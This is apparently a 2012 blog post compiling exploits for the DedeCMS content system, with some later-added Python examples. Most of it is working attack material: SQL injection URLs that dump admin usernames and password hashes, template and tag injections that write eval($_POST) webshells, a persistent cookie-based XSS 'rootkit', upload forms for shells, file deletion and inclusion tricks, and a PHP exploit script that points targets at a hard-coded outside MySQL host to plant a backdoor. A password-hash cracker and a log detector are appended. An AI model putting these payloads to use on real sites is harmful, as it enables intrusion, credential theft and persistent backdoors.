DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14

Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=15

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
Generates x.php with password xiao, i.e. a one-line webshell (the two base64 strings decode to the file name x.php and a <?php eval($_POST[xiao])?> stub).

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
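As an added illustration (not part of the original post), the wide-byte mechanism behind GBK injection, modelled in Python on raw bytes. It uses the classic 0xBF lead byte rather than the post's own payload; the table and column names, and the assumption that the post's payload relies on the same byte-level escaping versus multibyte parsing mismatch, are mine:

```python
"""Wide-byte (GBK) escape bypass, shown on raw bytes.

Added example; not code from the original post. It uses the classic 0xBF
lead byte to show the general mechanism; the post's payload (the UTF-8 bytes
of a Chinese string) is assumed to rely on the same mismatch between
byte-oriented escaping and multibyte-aware parsing.
"""

# Constructed attacker input: a GBK lead byte, then a quote and a tautology.
PAYLOAD = b"\xbf' OR 1=1 -- "


def addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping like PHP's addslashes()/magic_quotes: a
    backslash is put in front of ' " \\ and NUL with no charset knowledge."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # backslash
        out.append(b)
    return bytes(out)


def build_query_bytewise(uid: bytes) -> str:
    """Vulnerable order of operations: escape the raw bytes, then hand the
    result to a GBK connection. 0xBF 0x5C is one GBK character, so the
    backslash is swallowed and the quote after it is live again."""
    sql = b"SELECT * FROM dede_member WHERE userid='" + addslashes(uid) + b"'"
    return sql.decode("gbk", errors="replace")  # how a GBK parser sees it


def build_query_charwise(uid: bytes) -> str:
    """Hardened order: decode to characters first (malformed sequences are
    rejected), then escape the decoded string, so the inserted backslash can
    never pair with a preceding lead byte. Bound parameters are still the
    real fix; this only shows why the order matters."""
    text = uid.decode("gbk")  # strict: raises UnicodeDecodeError on 0xBF 0x27
    escaped = text.replace("\\", "\\\\").replace("'", "\\'")
    return "SELECT * FROM dede_member WHERE userid='" + escaped + "'"


def unescaped_quotes(sql: str) -> int:
    """Count single quotes not preceded by a backslash. The two wrapping
    quotes are expected; any more means the string literal was broken out of."""
    return sum(1 for i, ch in enumerate(sql)
               if ch == "'" and (i == 0 or sql[i - 1] != "\\"))


if __name__ == "__main__":
    broken = build_query_bytewise(PAYLOAD)
    print(broken, "->", unescaped_quotes(broken), "unescaped quotes")
    try:
        build_query_charwise(PAYLOAD)
    except UnicodeDecodeError as e:
        print("charwise path rejected the input:", e.reason)
```

The byte-wise path produces three unescaped quotes because 0xBF absorbed the backslash; the character-wise path refuses the malformed sequence outright and, for valid GBK input, keeps the backslash next to the quote it protects.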

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions: gotopage variable XSS vulnerability
1. Copy the URL below into the browser and open it; it triggers the XSS and installs the XSS rootkit. Note that IE8/9 block URL-based XSS, so their XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. From then on, opening either of the URLs below triggers our XSS no matter what the parameter contains.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS variable override getshell
#!/usr/bin/php
<?php
// DedeCMS "variable coverage" exploit: the request supplies
// _COOKIE[GLOBALS][cfg_db*] values, which plus/mytag_js.php accepts as its
// database settings, so the dede_mytag row (and the {dede:php} code in it)
// is fetched from a MySQL server the attacker controls. The host, user,
// password and database below are the ones hard-coded in the original
// script; that database must hold the aid row that writes the shell.
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if (!isset($argv[2])) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php ' . $argv[0] . ' url aid path
aid=1 shellpath /data/cache   aid=2 shellpath /   aid=3 shellpath /plus/
Example:
php ' . $argv[0] . ' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = isset($argv[3]) ? $argv[3] : '';
$exp  = Getshell($url, $aid, $path);
// The {dede:php} payload stored in dede_mytag echoes "OK" once the file is
// written (see the tag remote file write section below), so the body,
// not the "200 OK" status line, is what is checked here.
if (strpos($exp, "OK") !== false) {
    echo "Exploit Success \n";
    if ($aid == 1) echo "Shell:" . $url . "/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:" . $url . "/$path/fuck.php\n";
    if ($aid == 3) echo "Shell:" . $url . "/$path/plus/fuck.php\n";
} else {
    echo "Exploit Failed \n";
}

// Sends the POST to mytag_js.php and returns the response body.
function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = "80";
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1"
        . "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114"
        . "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit"
        . "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec"
        . "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit"
        . "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_"
        . "&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=" . $id . " HTTP/1.1\r\n";
    $data .= "Host: " . $host . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: close\r\n"; // close, so reading to EOF below terminates
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($content) . "\r\n\r\n";
    $data .= $content;
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "No response from " . $host . "\n";
        exit;
    }
    fwrite($ock, $data);
    $resp = '';
    while (!feof($ock)) {
        $resp .= fgets($ock, 1024);
    }
    fclose($ock);
    // Drop the status line and headers; only the body carries the payload output.
    $parts = explode("\r\n\r\n", $resp, 2);
    return isset($parts[1]) ? $parts[1] : '';
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the backend)
) L3 X+ O9 u7 S* B9 V+ w
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are logged straight into the site backend (the _POST[GLOBALS][cfg_db*] parameters point the login's database lookup at an attacker-controlled MySQL server, so the admin row and password it checks against are the attacker's own).

The precondition is that the backend path must be known.

Dedecms tag remote file write vulnerability
Precondition: you must have your own dede database ready, with this row inserted: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below and the shell appears as 1.php in the same directory. Work out the mechanics yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the target URL typed into the first field before posting
// (the original form defined this function but never hooked it up).
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member backend, publish an article, upload an image, then in attachment management replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg
Template content (prepend gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(these two fields are the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">Body</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="&lt;div&gt;&lt;a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;?phpinfo()?&gt;1111111&lt;/p&gt;" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>
Submit; if it reports success, we have changed the template path. 3. Open the edited article:
Assuming the edited article has aid 2, just visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is created in the plus directory.

DEDECMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

DedeCms V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCms V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

Note on the pwd column returned by the plus/advancedsearch.php query above: the stored value is the 32-char MD5 with the first 5 and the last 7 characters removed, giving a 20-char hash; trimming 3 more from the front and 1 from the back of that gives the 16-char MD5.
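A worked version of that rule, added here as an example (not DedeCMS's own code): it builds the 20-char form from a plaintext, trims it to the 16-char MD5, and runs a wordlist against a dumped value. The check and cracking helpers, and the wordlist, are this example's own.

```python
"""DedeCMS admin password format as described in the post.

Added example, not DedeCMS code. The post states two rules: the stored value
is md5(pwd) minus its first 5 and last 7 hex chars (20 chars), and removing
3 from the front and 1 from the back of that gives the 16-char MD5. Both
rules are taken from the post as given; the helpers around them are mine.
"""
import hashlib
import hmac
from typing import Iterable, Optional


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_admin_hash(password: str) -> str:
    """20-char stored form: md5[5:25], i.e. drop the first 5 and last 7."""
    return md5_hex(password)[5:25]


def dede20_to_md5_16(h20: str) -> str:
    """Front minus 3, back minus 1: yields md5[8:24], the 16-char MD5 that
    online lookup tables are indexed by."""
    if len(h20) != 20:
        raise ValueError("expected a 20-char DedeCMS hash")
    return h20[3:19]


def check_password(candidate: str, stored20: str) -> bool:
    """Constant-time compare of a candidate against the stored 20-char hash."""
    return hmac.compare_digest(dede_admin_hash(candidate), stored20)


def crack(stored20: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline wordlist attack on a dumped pwd value, which is what an
    attacker does with the output of the advancedsearch.php query."""
    for word in wordlist:
        if check_password(word, stored20):
            return word
    return None


if __name__ == "__main__":
    stored = dede_admin_hash("admin")          # constructed sample value
    print("stored 20-char:", stored)
    print("16-char MD5   :", dede20_to_md5_16(stored))
    print("cracked       :", crack(stored, ["123456", "password", "admin"]))
```

Because the 20-char value is a pure substring of an unsalted MD5, recovering the 16-char form costs nothing and every MD5 lookup table or wordlist cracker applies directly.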

DedeCms 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCms select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method="POST" enctype="multipart/form-data" name="myform">
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCms 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It relies on a MySQL field value overflow raising an error, combined with DedeCMS recording database error messages into a PHP file whose header is not validated.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following proves the injection worked.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Open test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the step 2 output means the trojan file was uploaded successfully.

DedeCms plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
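An added detection example (Python, not from the original post): it walks constructed Apache-style access-log lines and flags the request shapes used by the exploits collected in this post: GLOBALS overrides from the request, advancedsearch.php with sql=, gotopage XSS, edit_face.php delold with traversal, carbuyaction.php code=../, rss.php _Cs[ keys, POSTs to mytag_js.php, union/updatexml injection, and PHP code in a parameter as in the digg_frame.php case. The log lines, IPs and rule names are mine; POST bodies are not in access logs, so the mytag_js.php rule keys on the method only.

```python
"""Access-log detector for the DedeCMS exploit shapes collected above.

Added example, not DedeCMS code. The log lines below are constructed; the
rule names, IPs and matching heuristics are this example's own.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache-style lines (documentation IPs, no real hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512
203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0
203.0.113.7 - - [18/Oct/2012:10:43:01 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88
203.0.113.7 - - [18/Oct/2012:10:43:05 +0800] "GET /plus/carbuyaction.php?code=../../ HTTP/1.1" 200 1024
203.0.113.8 - - [18/Oct/2012:10:44:00 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%3D%22 HTTP/1.1" 200 3000
203.0.113.8 - - [18/Oct/2012:10:44:30 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 40
203.0.113.9 - - [18/Oct/2012:10:45:00 +0800] "GET /plus/feedback_js.php?arcurl='%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 700
203.0.113.9 - - [18/Oct/2012:10:45:10 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,(select%201),1)%23'][0]=15 HTTP/1.1" 500 0
203.0.113.9 - - [18/Oct/2012:10:45:20 +0800] "GET /plus/digg_frame.php?mid=*/eval($_POST[x]);var_dump(3);?> HTTP/1.1" 200 120
198.51.100.2 - - [18/Oct/2012:10:46:00 +0800] "GET /plus/mytag_js.php?aid=1 HTTP/1.1" 200 40
198.51.100.2 - - [18/Oct/2012:10:46:02 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
SQLI_RE = re.compile(r"union\s+select|updatexml\s*\(|extractvalue\s*\(", re.I)
GLOBALS_RE = re.compile(r"_(cookie|post|get|request|server)\[globals\]\[cfg_", re.I)
PHP_RE = re.compile(r"<\?php|\?>|\beval\s*\(", re.I)


def decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are
    matched in their decoded form."""
    for _ in range(rounds):
        new = unquote_plus(value)
        if new == value:
            break
        value = new
    return value


def classify(method: str, path: str, query: str) -> list:
    """Return the names of the rules that fire for one request."""
    q = decode(query)
    p = path.lower()
    params = {k: [decode(v) for v in vs]
              for k, vs in parse_qs(query, keep_blank_values=True).items()}

    def has(name, needle):
        return any(needle in v for v in params.get(name, []))

    hits = []
    if GLOBALS_RE.search(q):
        hits.append("globals-override")        # cfg_db* fed from the request
    if p.endswith("/plus/advancedsearch.php") and "sql" in params:
        hits.append("advancedsearch-raw-sql")  # raw SQL in sql=
    if has("gotopage", "<"):
        hits.append("gotopage-xss")
    if (p.endswith("/member/edit_face.php") and params.get("dopost") == ["delold"]
            and has("oldface", "../")):
        hits.append("edit_face-traversal")     # delold with path traversal
    if p.endswith("/plus/carbuyaction.php") and has("code", "../"):
        hits.append("carbuyaction-lfi")
    if p.endswith("/plus/rss.php") and any(k.startswith("_Cs[") for k in params):
        hits.append("rss-_Cs-injection")
    if p.endswith("/plus/mytag_js.php") and method == "POST":
        hits.append("mytag_js-post")           # normal use is a GET script include
    if SQLI_RE.search(q):
        hits.append("sql-injection-pattern")
    if PHP_RE.search(q):
        hits.append("php-code-in-param")       # digg_frame.php style log injection
    return hits


def scan(log_text: str) -> list:
    """Parse each line and collect the ones that trip at least one rule."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        rules = classify(m.group("method"), parts.path, parts.query)
        if rules:
            findings.append({"line": lineno, "ip": m.group("ip"),
                             "target": m.group("target"), "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']:>2} {f['ip']:<14} {','.join(f['rules'])}  {f['target']}")
```

The rules are deliberately narrow (exact script names, the delold/oldface pairing, POST rather than GET on mytag_js.php) so that ordinary DedeCMS traffic such as the last two lines stays quiet; widen them only after checking the false-positive rate on real logs.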